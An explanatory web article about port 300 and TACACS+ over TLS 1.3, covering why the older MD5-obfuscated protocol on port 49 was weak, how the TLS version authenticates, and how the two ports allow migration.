Port 300 carries TACACS+ over TLS 1.3, a protocol for authenticating network administrators to routers, switches, and other network infrastructure. Every time a network engineer logs into a Cisco router remotely, there's a good chance TACACS+ is checking whether they should be allowed in.
The protocol has been around since 1993. Port 300 has existed since December 2024.1
Why Port 300 Exists
TACACS+ traditionally runs on port 49. It's been running there for over 30 years. The protocol was developed by Cisco and became the standard way to manage authentication, authorization, and accounting (AAA) for network devices.2
The problem: TACACS+ was never properly encrypted.
The original protocol used MD5-based obfuscation—not encryption—to hide packet contents. Security researchers found you could compromise the encryption key with a single captured packet. Session IDs were too small. Headers weren't encrypted. There was no integrity checking, meaning attackers could flip bits in captured packets without detection.3
For decades, network administrators secured some of the most critical infrastructure on the Internet using a protocol with encryption weaker than what protects your grocery list app.
Port 300 is what happens when an industry admits the original design was insufficient and tries again.
How TACACS+ Over TLS Works
RFC 9887 defines TACACS+ over TLS 1.3.1 Instead of MD5-based obfuscation, connections to port 300 establish a full TLS 1.3 handshake before any TACACS+ data is exchanged.
The protocol supports two authentication methods:
- Certificate-based mutual authentication (mandatory for implementations): Both client and server verify each other's certificates, including revocation checking
- Pre-shared keys (optional): For constrained devices that can't handle certificate validation
The TACACS+ obfuscation mechanism defined in the original RFC 8907 specification is explicitly prohibited when operating over TLS. If you're using port 300, you're using real encryption.4
The Protocol That Controls the Controllers
TACACS+ handles AAA for network infrastructure:
- Authentication: Is this person who they claim to be?
- Authorization: What commands are they allowed to run?
- Accounting: What did they actually do?
It provides granular, command-by-command authorization. An administrator might be allowed to view router configurations but not change them. TACACS+ enforces that at the protocol level.2
The protocol is modular—you can use TACACS+ for authentication but handle authorization elsewhere. This separation is one reason it became the standard for enterprise network management, particularly in environments using Cisco equipment.
Port 49 vs Port 300
Legacy TACACS+ continues to run on port 49. Port 300 is explicitly for the TLS 1.3 version.
This creates a migration path: enterprises can run both ports simultaneously while transitioning infrastructure. Older devices that don't support TLS continue using port 49. Modern devices connect to port 300.
Port 300 UDP is marked as "Reserved" in the IANA registry—held for potential future use by the TACACS+ protocol, preventing other services from claiming it.5
Security Considerations
TACACS+ over TLS solves the encryption problems but doesn't eliminate all risks. The protocol still requires:
- Proper certificate management and revocation checking
- Secure key distribution for PSK deployments
- Network segmentation to prevent unauthorized access to TACACS+ servers
- Monitoring for authentication failures and unusual access patterns
Like any authentication system, TACACS+ over TLS is only as secure as the credentials and certificates protecting it.
The Honest Moment
Port 300 represents something unusual in Internet infrastructure: a protocol admitting its security model was broken and starting over.
Most legacy protocols limp along with incremental patches. TACACS+ got a new port number and a mandate to use modern encryption. Port 49 still exists—there are too many devices that can't be upgraded—but port 300 is the industry saying "we should have done this correctly the first time."
It's a rare second chance. Whether enterprises actually migrate to port 300 or continue running decades-old obfuscation on port 49 remains to be seen.
Related Ports
- Port 49: Legacy TACACS+ with MD5-based obfuscation
- Port 1812: RADIUS authentication (the competing AAA protocol)
- Port 1813: RADIUS accounting
How to Check What's Listening on Port 300
On Linux or macOS:
On Windows:
If you see port 300 open, you're running a TACACS+ server with TLS 1.3 support—or something is impersonating one.
Frequently Asked Questions
Was this page helpful?